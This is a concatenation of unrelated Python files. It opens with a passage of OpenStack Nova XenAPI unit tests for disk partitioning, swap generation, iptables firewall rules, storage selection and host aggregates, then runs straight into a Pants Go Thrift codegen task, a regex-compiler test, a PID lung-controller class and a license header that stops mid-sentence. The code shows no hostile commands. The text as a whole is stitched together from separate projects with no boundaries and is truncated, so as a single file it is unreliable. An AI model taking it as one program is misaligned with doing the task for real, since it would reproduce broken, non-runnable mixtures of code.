        self.stubs.Set(vm_utils, "_resize_part_and_fs",
                       fake_resize_part_and_fs)

        instance = db.instance_create(self.context, self.instance_values)
        disk_image_type = vm_utils.ImageType.DISK_VHD
        vm_ref = "blah"
        first_vdi_ref = "blah"
        vdis = ["blah"]

        self.conn._vmops._attach_disks(
            instance, disk_image_type, vm_ref, first_vdi_ref, vdis)

        self.assertEqual(marker["partition_called"], called)

    def test_instance_not_auto_disk_config(self):
        """Should not partition unless instance is marked as
        auto_disk_config.
        """
        self.instance_values['auto_disk_config'] = False
        self.assertIsPartitionCalled(False)

    @stub_vm_utils_with_vdi_attached_here
    def test_instance_auto_disk_config_doesnt_pass_fail_safes(self):
        """Should not partition unless fail safes pass"""
        self.instance_values['auto_disk_config'] = True

        def fake_get_partitions(dev):
            return [(1, 0, 100, 'ext4'), (2, 100, 200, 'ext4')]
        self.stubs.Set(vm_utils, "_get_partitions",
                       fake_get_partitions)

        self.assertIsPartitionCalled(False)

    @stub_vm_utils_with_vdi_attached_here
    def test_instance_auto_disk_config_passes_fail_safes(self):
        """Should partition if instance is marked as auto_disk_config=True and
        virt-layer specific fail-safe checks pass.
        """
        self.instance_values['auto_disk_config'] = True

        def fake_get_partitions(dev):
            return [(1, 0, 100, 'ext4')]
        self.stubs.Set(vm_utils, "_get_partitions",
                       fake_get_partitions)

        self.assertIsPartitionCalled(True)


class XenAPIGenerateLocal(test.TestCase):
    """Test generating of local disks, like swap and ephemeral"""
    def setUp(self):
        super(XenAPIGenerateLocal, self).setUp()
        self.flags(target_host='127.0.0.1',
                   xenapi_connection_url='test_url',
                   xenapi_connection_password='test_pass',
                   xenapi_generate_swap=True,
                   firewall_driver='nova.virt.xenapi.firewall.'
                                   'Dom0IptablesFirewallDriver')
        stubs.stubout_session(self.stubs, stubs.FakeSessionForVMTests)
        db_fakes.stub_out_db_instance_api(self.stubs)
        xenapi_fake.reset()
        self.conn = xenapi_conn.get_connection(False)

        self.user_id = 'fake'
        self.project_id = 'fake'

        self.instance_values = {'id': 1,
                  'project_id': self.project_id,
                  'user_id': self.user_id,
                  'image_ref': 1,
                  'kernel_id': 2,
                  'ramdisk_id': 3,
                  'root_gb': 20,
                  'instance_type_id': '3',  # m1.large
                  'os_type': 'linux',
                  'architecture': 'x86-64'}

        self.context = context.RequestContext(self.user_id, self.project_id)

        @classmethod
        def fake_create_vbd(cls, session, vm_ref, vdi_ref, userdevice,
                            vbd_type='disk', read_only=False, bootable=True):
            pass

        self.stubs.Set(vm_utils.VMHelper,
                       "create_vbd",
                       fake_create_vbd)

    def assertCalled(self, instance):
        disk_image_type = vm_utils.ImageType.DISK_VHD
        vm_ref = "blah"
        first_vdi_ref = "blah"
        vdis = ["blah"]

        self.called = False
        self.conn._vmops._attach_disks(instance, disk_image_type,
                                       vm_ref, first_vdi_ref, vdis)
        self.assertTrue(self.called)

    def test_generate_swap(self):
        """Test swap disk generation."""
        instance = db.instance_create(self.context, self.instance_values)
        instance = db.instance_update(self.context, instance['id'],
                                      {'instance_type_id': 5})

        @classmethod
        def fake_generate_swap(cls, *args, **kwargs):
            self.called = True
        self.stubs.Set(vm_utils.VMHelper, 'generate_swap',
                       fake_generate_swap)

        self.assertCalled(instance)

    def test_generate_ephemeral(self):
        """Test ephemeral disk generation."""
        instance = db.instance_create(self.context, self.instance_values)
        instance = db.instance_update(self.context, instance['id'],
                                      {'instance_type_id': 4})

        @classmethod
        def fake_generate_ephemeral(cls, *args):
            self.called = True
        self.stubs.Set(vm_utils.VMHelper, 'generate_ephemeral',
                       fake_generate_ephemeral)

        self.assertCalled(instance)


class XenAPIBWUsageTestCase(test.TestCase):
    def setUp(self):
        super(XenAPIBWUsageTestCase, self).setUp()
        self.stubs.Set(vm_utils.VMHelper, "compile_metrics",
                       XenAPIBWUsageTestCase._fake_compile_metrics)
        self.flags(target_host='127.0.0.1',
                   xenapi_connection_url='test_url',
                   xenapi_connection_password='test_pass',
                   firewall_driver='nova.virt.xenapi.firewall.'
                                   'Dom0IptablesFirewallDriver')
        stubs.stubout_session(self.stubs, stubs.FakeSessionForVMTests)
        xenapi_fake.reset()
        self.conn = xenapi_conn.get_connection(False)

    @classmethod
    def _fake_compile_metrics(cls, start_time, stop_time=None):
        raise exception.CouldNotFetchMetrics()

    def test_get_all_bw_usage_in_failure_case(self):
        """Test that get_all_bw_usage returns an empty list when metrics
        compilation failed.  c.f. bug #910045.
        """
        class testinstance(object):
            def __init__(self):
                self.name = "instance-0001"
                self.uuid = "1-2-3-4-5"

        result = self.conn.get_all_bw_usage([testinstance()],
                datetime.datetime.utcnow())
        self.assertEqual(result, [])


# TODO(salvatore-orlando): this class and
# nova.tests.test_libvirt.IPTablesFirewallDriverTestCase share a lot of code.
# Consider abstracting common code in a base class for firewall driver testing.
class XenAPIDom0IptablesFirewallTestCase(test.TestCase):

    _in_nat_rules = [
      '# Generated by iptables-save v1.4.10 on Sat Feb 19 00:03:19 2011',
      '*nat',
      ':PREROUTING ACCEPT [1170:189210]',
      ':INPUT ACCEPT [844:71028]',
      ':OUTPUT ACCEPT [5149:405186]',
      ':POSTROUTING ACCEPT [5063:386098]',
    ]

    _in_filter_rules = [
      '# Generated by iptables-save v1.4.4 on Mon Dec  6 11:54:13 2010',
      '*filter',
      ':INPUT ACCEPT [969615:281627771]',
      ':FORWARD ACCEPT [0:0]',
      ':OUTPUT ACCEPT [915599:63811649]',
      ':nova-block-ipv4 - [0:0]',
      '-A INPUT -i virbr0 -p tcp -m tcp --dport 67 -j ACCEPT ',
      '-A FORWARD -d 192.168.122.0/24 -o virbr0 -m state --state RELATED'
      ',ESTABLISHED -j ACCEPT ',
      '-A FORWARD -s 192.168.122.0/24 -i virbr0 -j ACCEPT ',
      '-A FORWARD -i virbr0 -o virbr0 -j ACCEPT ',
      '-A FORWARD -o virbr0 -j REJECT --reject-with icmp-port-unreachable ',
      '-A FORWARD -i virbr0 -j REJECT --reject-with icmp-port-unreachable ',
      'COMMIT',
      '# Completed on Mon Dec  6 11:54:13 2010',
    ]

    _in6_filter_rules = [
      '# Generated by ip6tables-save v1.4.4 on Tue Jan 18 23:47:56 2011',
      '*filter',
      ':INPUT ACCEPT [349155:75810423]',
      ':FORWARD ACCEPT [0:0]',
      ':OUTPUT ACCEPT [349256:75777230]',
      'COMMIT',
      '# Completed on Tue Jan 18 23:47:56 2011',
    ]

    def setUp(self):
        super(XenAPIDom0IptablesFirewallTestCase, self).setUp()
        self.flags(xenapi_connection_url='test_url',
                   xenapi_connection_password='test_pass',
                   instance_name_template='%d',
                   firewall_driver='nova.virt.xenapi.firewall.'
                                   'Dom0IptablesFirewallDriver')
        xenapi_fake.reset()
        xenapi_fake.create_local_srs()
        xenapi_fake.create_local_pifs()
        self.user_id = 'mappin'
        self.project_id = 'fake'
        stubs.stubout_session(self.stubs, stubs.FakeSessionForFirewallTests,
                              test_case=self)
        self.context = context.RequestContext(self.user_id, self.project_id)
        self.network = importutils.import_object(FLAGS.network_manager)
        self.conn = xenapi_conn.get_connection(False)
        self.fw = self.conn._vmops.firewall_driver

    def _create_instance_ref(self):
        return db.instance_create(self.context,
                                  {'user_id': self.user_id,
                                   'project_id': self.project_id,
                                   'instance_type_id': 1})

    def _create_test_security_group(self):
        admin_ctxt = context.get_admin_context()
        secgroup = db.security_group_create(admin_ctxt,
                                {'user_id': self.user_id,
                                 'project_id': self.project_id,
                                 'name': 'testgroup',
                                 'description': 'test group'})
        db.security_group_rule_create(admin_ctxt,
                                      {'parent_group_id': secgroup['id'],
                                       'protocol': 'icmp',
                                       'from_port': -1,
                                       'to_port': -1,
                                       'cidr': '192.168.11.0/24'})

        db.security_group_rule_create(admin_ctxt,
                                      {'parent_group_id': secgroup['id'],
                                       'protocol': 'icmp',
                                       'from_port': 8,
                                       'to_port': -1,
                                       'cidr': '192.168.11.0/24'})

        db.security_group_rule_create(admin_ctxt,
                                      {'parent_group_id': secgroup['id'],
                                       'protocol': 'tcp',
                                       'from_port': 80,
                                       'to_port': 81,
                                       'cidr': '192.168.10.0/24'})
        return secgroup

    def _validate_security_group(self):
        in_rules = filter(lambda l: not l.startswith('#'),
                          self._in_filter_rules)
        for rule in in_rules:
            if not 'nova' in rule:
                self.assertTrue(rule in self._out_rules,
                                'Rule went missing: %s' % rule)

        instance_chain = None
        for rule in self._out_rules:
            # This is pretty crude, but it'll do for now
            # last two octets change
            if re.search('-d 192.168.[0-9]{1,3}.[0-9]{1,3} -j', rule):
                instance_chain = rule.split(' ')[-1]
                break
        self.assertTrue(instance_chain, "The instance chain wasn't added")
        security_group_chain = None
        for rule in self._out_rules:
            # This is pretty crude, but it'll do for now
            if '-A %s -j' % instance_chain in rule:
                security_group_chain = rule.split(' ')[-1]
                break
        self.assertTrue(security_group_chain,
                        "The security group chain wasn't added")

        regex = re.compile('-A .* -j ACCEPT -p icmp -s 192.168.11.0/24')
        self.assertTrue(len(filter(regex.match, self._out_rules)) > 0,
                        "ICMP acceptance rule wasn't added")

        regex = re.compile('-A .* -j ACCEPT -p icmp -m icmp --icmp-type 8'
                           ' -s 192.168.11.0/24')
        self.assertTrue(len(filter(regex.match, self._out_rules)) > 0,
                        "ICMP Echo Request acceptance rule wasn't added")

        regex = re.compile('-A .* -j ACCEPT -p tcp --dport 80:81'
                           ' -s 192.168.10.0/24')
        self.assertTrue(len(filter(regex.match, self._out_rules)) > 0,
                        "TCP port 80/81 acceptance rule wasn't added")

    def test_static_filters(self):
        instance_ref = self._create_instance_ref()
        src_instance_ref = self._create_instance_ref()
        admin_ctxt = context.get_admin_context()
        secgroup = self._create_test_security_group()

        src_secgroup = db.security_group_create(admin_ctxt,
                                                {'user_id': self.user_id,
                                                 'project_id': self.project_id,
                                                 'name': 'testsourcegroup',
                                                 'description': 'src group'})
        db.security_group_rule_create(admin_ctxt,
                                      {'parent_group_id': secgroup['id'],
                                       'protocol': 'tcp',
                                       'from_port': 80,
                                       'to_port': 81,
                                       'group_id': src_secgroup['id']})

        db.instance_add_security_group(admin_ctxt, instance_ref['uuid'],
                                       secgroup['id'])
        db.instance_add_security_group(admin_ctxt, src_instance_ref['uuid'],
                                       src_secgroup['id'])
        instance_ref = db.instance_get(admin_ctxt, instance_ref['id'])
        src_instance_ref = db.instance_get(admin_ctxt, src_instance_ref['id'])

        network_model = fake_network.fake_get_instance_nw_info(self.stubs,
                                                      1, spectacular=True)

        fake_network.stub_out_nw_api_get_instance_nw_info(self.stubs,
                                      lambda *a, **kw: network_model)

        network_info = compute_utils.legacy_network_info(network_model)
        self.fw.prepare_instance_filter(instance_ref, network_info)
        self.fw.apply_instance_filter(instance_ref, network_info)

        self._validate_security_group()
        # Extra test for TCP acceptance rules
        for ip in network_model.fixed_ips():
            if ip['version'] != 4:
                continue
            regex = re.compile('-A .* -j ACCEPT -p tcp'
                               ' --dport 80:81 -s %s' % ip['address'])
            self.assertTrue(len(filter(regex.match, self._out_rules)) > 0,
                            "TCP port 80/81 acceptance rule wasn't added")

        db.instance_destroy(admin_ctxt, instance_ref['id'])

    def test_filters_for_instance_with_ip_v6(self):
        self.flags(use_ipv6=True)
        network_info = fake_network.fake_get_instance_nw_info(self.stubs, 1)
        rulesv4, rulesv6 = self.fw._filters_for_instance("fake", network_info)
        self.assertEquals(len(rulesv4), 2)
        self.assertEquals(len(rulesv6), 1)

    def test_filters_for_instance_without_ip_v6(self):
        self.flags(use_ipv6=False)
        network_info = fake_network.fake_get_instance_nw_info(self.stubs, 1)
        rulesv4, rulesv6 = self.fw._filters_for_instance("fake", network_info)
        self.assertEquals(len(rulesv4), 2)
        self.assertEquals(len(rulesv6), 0)

    def test_multinic_iptables(self):
        ipv4_rules_per_addr = 1
        ipv4_addr_per_network = 2
        ipv6_rules_per_addr = 1
        ipv6_addr_per_network = 1
        networks_count = 5
        instance_ref = self._create_instance_ref()
        _get_instance_nw_info = fake_network.fake_get_instance_nw_info
        network_info = _get_instance_nw_info(self.stubs,
                                             networks_count,
                                             ipv4_addr_per_network)
        ipv4_len = len(self.fw.iptables.ipv4['filter'].rules)
        ipv6_len = len(self.fw.iptables.ipv6['filter'].rules)
        inst_ipv4, inst_ipv6 = self.fw.instance_rules(instance_ref,
                                                      network_info)
        self.fw.prepare_instance_filter(instance_ref, network_info)
        ipv4 = self.fw.iptables.ipv4['filter'].rules
        ipv6 = self.fw.iptables.ipv6['filter'].rules
        ipv4_network_rules = len(ipv4) - len(inst_ipv4) - ipv4_len
        ipv6_network_rules = len(ipv6) - len(inst_ipv6) - ipv6_len
        self.assertEquals(ipv4_network_rules,
                  ipv4_rules_per_addr * ipv4_addr_per_network * networks_count)
        self.assertEquals(ipv6_network_rules,
                  ipv6_rules_per_addr * ipv6_addr_per_network * networks_count)

    def test_do_refresh_security_group_rules(self):
        admin_ctxt = context.get_admin_context()
        instance_ref = self._create_instance_ref()
        network_info = fake_network.fake_get_instance_nw_info(self.stubs, 1, 1)
        secgroup = self._create_test_security_group()
        db.instance_add_security_group(admin_ctxt, instance_ref['uuid'],
                                       secgroup['id'])
        self.fw.prepare_instance_filter(instance_ref, network_info)
        self.fw.instances[instance_ref['id']] = instance_ref
        self._validate_security_group()
        # add a rule to the security group
        db.security_group_rule_create(admin_ctxt,
                                      {'parent_group_id': secgroup['id'],
                                       'protocol': 'udp',
                                       'from_port': 200,
                                       'to_port': 299,
                                       'cidr': '192.168.99.0/24'})
        #validate the extra rule
        self.fw.refresh_security_group_rules(secgroup)
        regex = re.compile('-A .* -j ACCEPT -p udp --dport 200:299'
                           ' -s 192.168.99.0/24')
        self.assertTrue(len(filter(regex.match, self._out_rules)) > 0,
                        "Rules were not updated properly."
                        "The rule for UDP acceptance is missing")

    def test_provider_firewall_rules(self):
        # setup basic instance data
        instance_ref = self._create_instance_ref()
        # FRAGILE: as in libvirt tests
        # peeks at how the firewall names chains
        chain_name = 'inst-%s' % instance_ref['id']

        network_info = fake_network.fake_get_instance_nw_info(self.stubs, 1, 1)
        self.fw.prepare_instance_filter(instance_ref, network_info)
        self.assertTrue('provider' in self.fw.iptables.ipv4['filter'].chains)
        rules = [rule for rule in self.fw.iptables.ipv4['filter'].rules
                      if rule.chain == 'provider']
        self.assertEqual(0, len(rules))

        admin_ctxt = context.get_admin_context()
        # add a rule and send the update message, check for 1 rule
        provider_fw0 = db.provider_fw_rule_create(admin_ctxt,
                                                  {'protocol': 'tcp',
                                                   'cidr': '10.99.99.99/32',
                                                   'from_port': 1,
                                                   'to_port': 65535})
        self.fw.refresh_provider_fw_rules()
        rules = [rule for rule in self.fw.iptables.ipv4['filter'].rules
                      if rule.chain == 'provider']
        self.assertEqual(1, len(rules))

        # Add another, refresh, and make sure number of rules goes to two
        provider_fw1 = db.provider_fw_rule_create(admin_ctxt,
                                                  {'protocol': 'udp',
                                                   'cidr': '10.99.99.99/32',
                                                   'from_port': 1,
                                                   'to_port': 65535})
        self.fw.refresh_provider_fw_rules()
        rules = [rule for rule in self.fw.iptables.ipv4['filter'].rules
                      if rule.chain == 'provider']
        self.assertEqual(2, len(rules))

        # create the instance filter and make sure it has a jump rule
        self.fw.prepare_instance_filter(instance_ref, network_info)
        self.fw.apply_instance_filter(instance_ref, network_info)
        inst_rules = [rule for rule in self.fw.iptables.ipv4['filter'].rules
                           if rule.chain == chain_name]
        jump_rules = [rule for rule in inst_rules if '-j' in rule.rule]
        provjump_rules = []
        # IptablesTable doesn't make rules unique internally
        for rule in jump_rules:
            if 'provider' in rule.rule and rule not in provjump_rules:
                provjump_rules.append(rule)
        self.assertEqual(1, len(provjump_rules))

        # remove a rule from the db, cast to compute to refresh rule
        db.provider_fw_rule_destroy(admin_ctxt, provider_fw1['id'])
        self.fw.refresh_provider_fw_rules()
        rules = [rule for rule in self.fw.iptables.ipv4['filter'].rules
                      if rule.chain == 'provider']
        self.assertEqual(1, len(rules))


class XenAPISRSelectionTestCase(test.TestCase):
    """Unit tests for testing we find the right SR."""
    def setUp(self):
        super(XenAPISRSelectionTestCase, self).setUp()
        xenapi_fake.reset()

    def test_safe_find_sr_raise_exception(self):
        """Ensure StorageRepositoryNotFound is raise when wrong filter."""
        self.flags(sr_matching_filter='yadayadayada')
        stubs.stubout_session(self.stubs, stubs.FakeSessionForVMTests)
        session = xenapi_conn.XenAPISession('test_url', 'root', 'test_pass')
        helper = vm_utils.VMHelper
        helper.XenAPI = session.get_imported_xenapi()
        self.assertRaises(exception.StorageRepositoryNotFound,
                          helper.safe_find_sr, session)

    def test_safe_find_sr_local_storage(self):
        """Ensure the default local-storage is found."""
        self.flags(sr_matching_filter='other-config:i18n-key=local-storage')
        stubs.stubout_session(self.stubs, stubs.FakeSessionForVMTests)
        session = xenapi_conn.XenAPISession('test_url', 'root', 'test_pass')
        helper = vm_utils.VMHelper
        helper.XenAPI = session.get_imported_xenapi()
        host_ref = xenapi_fake.get_all('host')[0]
        local_sr = xenapi_fake.create_sr(
                              name_label='Fake Storage',
                              type='lvm',
                              other_config={'i18n-original-value-name_label':
                                            'Local storage',
                                            'i18n-key': 'local-storage'},
                              host_ref=host_ref)
        expected = helper.safe_find_sr(session)
        self.assertEqual(local_sr, expected)

    def test_safe_find_sr_by_other_criteria(self):
        """Ensure the SR is found when using a different filter."""
        self.flags(sr_matching_filter='other-config:my_fake_sr=true')
        stubs.stubout_session(self.stubs, stubs.FakeSessionForVMTests)
        session = xenapi_conn.XenAPISession('test_url', 'root', 'test_pass')
        helper = vm_utils.VMHelper
        helper.XenAPI = session.get_imported_xenapi()
        host_ref = xenapi_fake.get_all('host')[0]
        local_sr = xenapi_fake.create_sr(name_label='Fake Storage',
                                         type='lvm',
                                         other_config={'my_fake_sr': 'true'},
                                         host_ref=host_ref)
        expected = helper.safe_find_sr(session)
        self.assertEqual(local_sr, expected)

    def test_safe_find_sr_default(self):
        """Ensure the default SR is found regardless of other-config."""
        self.flags(sr_matching_filter='default-sr:true')
        stubs.stubout_session(self.stubs, stubs.FakeSessionForVMTests)
        session = xenapi_conn.XenAPISession('test_url', 'root', 'test_pass')
        helper = vm_utils.VMHelper
        pool_ref = xenapi_fake.create_pool('')
        helper.XenAPI = session.get_imported_xenapi()
        expected = helper.safe_find_sr(session)
        self.assertEqual(session.call_xenapi('pool.get_default_SR', pool_ref),
                         expected)


class XenAPIAggregateTestCase(test.TestCase):
    """Unit tests for aggregate operations."""
    def setUp(self):
        super(XenAPIAggregateTestCase, self).setUp()
        self.flags(xenapi_connection_url='http://test_url',
                   xenapi_connection_username='test_user',
                   xenapi_connection_password='test_pass',
                   instance_name_template='%d',
                   firewall_driver='nova.virt.xenapi.firewall.'
                                   'Dom0IptablesFirewallDriver',
                   host='host')
        xenapi_fake.reset()
        host_ref = xenapi_fake.get_all('host')[0]
        stubs.stubout_session(self.stubs, stubs.FakeSessionForVMTests)
        self.context = context.get_admin_context()
        self.conn = xenapi_conn.get_connection(False)
        self.fake_metadata = {'main_compute': 'host',
                              'host': xenapi_fake.get_record('host',
                                                             host_ref)['uuid']}

    def test_add_to_aggregate_called(self):
        def fake_add_to_aggregate(context, aggregate, host):
            fake_add_to_aggregate.called = True
        self.stubs.Set(self.conn._pool,
                       "add_to_aggregate",
                       fake_add_to_aggregate)

        self.conn.add_to_aggregate(None, None, None)
        self.assertTrue(fake_add_to_aggregate.called)

    def test_add_to_aggregate_for_first_host_sets_metadata(self):
        def fake_init_pool(id, name):
            fake_init_pool.called = True
        self.stubs.Set(self.conn._pool, "_init_pool", fake_init_pool)

        aggregate = self._aggregate_setup()
        self.conn._pool.add_to_aggregate(self.context, aggregate, "host")
        result = db.aggregate_get(self.context, aggregate.id)
        self.assertTrue(fake_init_pool.called)
        self.assertDictMatch(self.fake_metadata, result.metadetails)
        self.assertEqual(aggregate_states.ACTIVE, result.operational_state)

    def test_join_subordinate(self):
        """Ensure join_subordinate gets called when the request gets to main."""
        def fake_join_subordinate(id, compute_uuid, host, url, user, password):
            fake_join_subordinate.called = True
        self.stubs.Set(self.conn._pool, "_join_subordinate", fake_join_subordinate)

        aggregate = self._aggregate_setup(hosts=['host', 'host2'],
                                          metadata=self.fake_metadata)
        self.conn._pool.add_to_aggregate(self.context, aggregate, "host2",
                                         compute_uuid='fake_uuid',
                                         url='fake_url',
                                         user='fake_user',
                                         passwd='fake_pass',
                                         xenhost_uuid='fake_uuid')
        self.assertTrue(fake_join_subordinate.called)

    def test_add_to_aggregate_first_host(self):
        def fake_pool_set_name_label(self, session, pool_ref, name):
            fake_pool_set_name_label.called = True
        self.stubs.Set(xenapi_fake.SessionBase, "pool_set_name_label",
                       fake_pool_set_name_label)
        self.conn._session.call_xenapi("pool.create", {"name": "asdf"})

        values = {"name": 'fake_aggregate',
                  "availability_zone": 'fake_zone'}
        result = db.aggregate_create(self.context, values)
        db.aggregate_host_add(self.context, result.id, "host")
        aggregate = db.aggregate_get(self.context, result.id)
        self.assertEqual(["host"], aggregate.hosts)
        self.assertEqual({}, aggregate.metadetails)

        self.conn._pool.add_to_aggregate(self.context, aggregate, "host")
        self.assertTrue(fake_pool_set_name_label.called)

    def test_remove_from_aggregate_called(self):
        def fake_remove_from_aggregate(context, aggregate, host):
            fake_remove_from_aggregate.called = True
        self.stubs.Set(self.conn._pool,
                       "remove_from_aggregate",
                       fake_remove_from_aggregate)

        self.conn.remove_from_aggregate(None, None, None)
        self.assertTrue(fake_remove_from_aggregate.called)

    def test_remove_from_empty_aggregate(self):
        values = {"name": 'fake_aggregate',
                  "availability_zone": 'fake_zone'}
        result = db.aggregate_create(self.context, values)
        self.assertRaises(exception.AggregateError,
                          self.conn._pool.remove_from_aggregate,
                          None, result, "test_host")

    def test_remove_subordinate(self):
        """Ensure eject subordinate gets called."""
        def fake_eject_subordinate(id, compute_uuid, host_uuid):
            fake_eject_subordinate.called = True
        self.stubs.Set(self.conn._pool, "_eject_subordinate", fake_eject_subordinate)

        self.fake_metadata['host2'] = 'fake_host2_uuid'
        aggregate = self._aggregate_setup(hosts=['host', 'host2'],
                                          metadata=self.fake_metadata)
        self.conn._pool.remove_from_aggregate(self.context, aggregate, "host2")
        self.assertTrue(fake_eject_subordinate.called)

    def test_remove_main_solo(self):
        """Ensure metadata are cleared after removal."""
        def fake_clear_pool(id):
            fake_clear_pool.called = True
        self.stubs.Set(self.conn._pool, "_clear_pool", fake_clear_pool)

        aggregate = self._aggregate_setup(aggr_state=aggregate_states.ACTIVE,
                                          metadata=self.fake_metadata)
        self.conn._pool.remove_from_aggregate(self.context, aggregate, "host")
        result = db.aggregate_get(self.context, aggregate.id)
        self.assertTrue(fake_clear_pool.called)
        self.assertDictMatch({}, result.metadetails)
        self.assertEqual(aggregate_states.ACTIVE, result.operational_state)

    def test_remote_main_non_empty_pool(self):
        """Ensure AggregateError is raised if removing the main."""
        aggregate = self._aggregate_setup(aggr_state=aggregate_states.ACTIVE,
                                          hosts=['host', 'host2'],
                                          metadata=self.fake_metadata)
        self.assertRaises(exception.InvalidAggregateAction,
                          self.conn._pool.remove_from_aggregate,
                          self.context, aggregate, "host")

    def _aggregate_setup(self, aggr_name='fake_aggregate',
                         aggr_zone='fake_zone',
                         aggr_state=aggregate_states.CREATED,
                         hosts=['host'], metadata=None):
        values = {"name": aggr_name,
                  "availability_zone": aggr_zone,
                  "operational_state": aggr_state, }
        result = db.aggregate_create(self.context, values)
        for host in hosts:
            db.aggregate_host_add(self.context, result.id, host)
        if metadata:
            db.aggregate_metadata_add(self.context, result.id, metadata)
        return db.aggregate_get(self.context, result.id)

# coding=utf-8
# Copyright 2014 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).

from __future__ import (absolute_import, division, generators, nested_scopes, print_function,
                        unicode_literals, with_statement)

import os
import re
import subprocess

from pants.backend.codegen.subsystems.thrift_defaults import ThriftDefaults
from pants.base.build_environment import get_buildroot
from pants.base.exceptions import TaskError
from pants.base.workunit import WorkUnitLabel
from pants.binaries.thrift_binary import ThriftBinary
from pants.task.simple_codegen_task import SimpleCodegenTask
from pants.util.dirutil import safe_mkdir
from pants.util.memo import memoized_property
from twitter.common.collections import OrderedSet

from pants.contrib.go.targets.go_thrift_library import GoThriftGenLibrary, GoThriftLibrary


class GoThriftGen(SimpleCodegenTask):

  @classmethod
  def register_options(cls, register):
    super(GoThriftGen, cls).register_options(register)

    register('--strict', default=True, fingerprint=True, type=bool,
             help='Run thrift compiler with strict warnings.')
    register('--gen-options', advanced=True, fingerprint=True,
            help='Use these apache thrift go gen options.')
    register('--thrift-import', advanced=True,
             help='Use this thrift-import gen option to thrift.')
    register('--thrift-import-target', advanced=True,
             help='Use this thrift import on symbolic defs.')

  @classmethod
  def subsystem_dependencies(cls):
    return (super(GoThriftGen, cls).subsystem_dependencies() +
            (ThriftDefaults, ThriftBinary.Factory.scoped(cls)))

  @memoized_property
  def _thrift_binary(self):
    thrift_binary = ThriftBinary.Factory.scoped_instance(self).create()
    return thrift_binary.path

  @memoized_property
  def _deps(self):
    thrift_import_target = self.get_options().thrift_import_target
    thrift_imports = self.context.resolve(thrift_import_target)
    return thrift_imports

  @memoized_property
  def _service_deps(self):
    service_deps = self.get_options().get('service_deps')
    return list(self.resolve_deps(service_deps)) if service_deps else self._deps

  SERVICE_PARSER = re.compile(r'^\s*service\s+(?:[^\s{]+)')
  NAMESPACE_PARSER = re.compile(r'^\s*namespace go\s+([^\s]+)', re.MULTILINE)

  def _declares_service(self, source):
    with open(source) as thrift:
      return any(line for line in thrift if self.SERVICE_PARSER.search(line))

  def _get_go_namespace(self, source):
    with open(source) as thrift:
      namespace = self.NAMESPACE_PARSER.search(thrift.read())
      if not namespace:
        raise TaskError('Thrift file {} must contain "namespace go "', source)
      return namespace.group(1)

  def synthetic_target_extra_dependencies(self, target, target_workdir):
    for source in target.sources_relative_to_buildroot():
      if self._declares_service(os.path.join(get_buildroot(), source)):
        return self._service_deps
    return self._deps

  def synthetic_target_type(self, target):
    return GoThriftGenLibrary

  def is_gentarget(self, target):
    return isinstance(target, GoThriftLibrary)

  @memoized_property
  def _thrift_cmd(self):
    cmd = [self._thrift_binary]
    thrift_import = 'thrift_import={}'.format(self.get_options().thrift_import)
    gen_options = self.get_options().gen_options
    if gen_options:
      gen_options += ',' + thrift_import
    else:
      gen_options = thrift_import
    cmd.extend(('--gen', 'go:{}'.format(gen_options)))

    if self.get_options().strict:
      cmd.append('-strict')
    if self.get_options().level == 'debug':
      cmd.append('-verbose')
    return cmd

  def _generate_thrift(self, target, target_workdir):
    target_cmd = self._thrift_cmd[:]

    bases = OrderedSet(tgt.target_base for tgt in target.closure() if self.is_gentarget(tgt))
    for base in bases:
      target_cmd.extend(('-I', base))

    target_cmd.extend(('-o', target_workdir))

    all_sources = list(target.sources_relative_to_buildroot())
    if len(all_sources) != 1:
      raise TaskError('go_thrift_library only supports a single .thrift source file for {}.', target)

    source = all_sources[0]
    target_cmd.append(os.path.join(get_buildroot(), source))
    with self.context.new_workunit(name=source,
                                   labels=[WorkUnitLabel.TOOL],
                                   cmd=' '.join(target_cmd)) as workunit:
      result = subprocess.call(target_cmd,
                               stdout=workunit.output('stdout'),
                              stderr=workunit.output('stderr'))
      if result != 0:
        raise TaskError('{} ... exited non-zero ({})'.format(self._thrift_binary, result))

    gen_dir = os.path.join(target_workdir, 'gen-go')
    src_dir = os.path.join(target_workdir, 'src')
    safe_mkdir(src_dir)
    go_dir = os.path.join(target_workdir, 'src', 'go')
    os.rename(gen_dir, go_dir)

  @classmethod
  def product_types(cls):
    return ['go']

  def execute_codegen(self, target, target_workdir):
    self._generate_thrift(target, target_workdir)

  @property
  def _copy_target_attributes(self):
    """Override `_copy_target_attributes` to exclude `provides`."""
    return [a for a in super(GoThriftGen, self)._copy_target_attributes if a != 'provides']

  def synthetic_target_dir(self, target, target_workdir):
    all_sources = list(target.sources_relative_to_buildroot())
    source = all_sources[0]
    namespace = self._get_go_namespace(source)
    return os.path.join(target_workdir, 'src', 'go', namespace.replace(".", os.path.sep))

import unittest, re
from rexp.compiler import PatternCompiler


class CompilerTestMethods(unittest.TestCase):
    def test_compile_1(self):
        compiler = PatternCompiler(pattern_set=dict(
            TEST=r'\w+'
        ))

        try:
            c1 = compiler.compile('$1{TEST}')
        except Exception as exc:
            self.assertTrue(1)

        c1 = compiler.compile('$1{TEST}', ['test'])
        self.assertEqual(c1, r'(?:(?P<test>(\w+)))')

    def test_compile_2(self):
        compiler = PatternCompiler(pattern_set=dict(
            TEST=r'\w+'
        ))

        try:
            c1 = compiler.compile('$1{TEST}')
        except:
            self.assertTrue(1)

        c1 = compiler.compile('$1{TEST}', ['test'])
        self.assertEqual(c1, r'(?:(?P<test>(\w+)))')

import torch

from deluca.lung.core import Controller, LungEnv


class PIDCorrection(Controller):
    def __init__(self, base_controller: Controller, sim: LungEnv, pid_K=[0.0, 0.0], decay=0.1, **kwargs):
        self.base_controller = base_controller
        self.sim = sim
        self.I = 0.0
        self.K = pid_K
        self.decay = decay

        self.reset()

    def reset(self):
        self.base_controller.reset()
        self.sim.reset()
        self.I = 0.0

    def compute_action(self, state, t):
        u_in_base, u_out = self.base_controller(state, t)

        err = self.sim.pressure - state
        self.I = self.I * (1 - self.decay) + err * self.decay

        pid_correction = self.K[0] * err + self.K[1] * self.I

        u_in = torch.clamp(u_in_base + pid_correction, min=0.0, max=100.0)
        self.sim(u_in, u_out, t)

        return u_in, u_out

# -*- coding: UTF-8 -*-
from __future__ import unicode_literals, print_function, division

# Copyright 2021 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
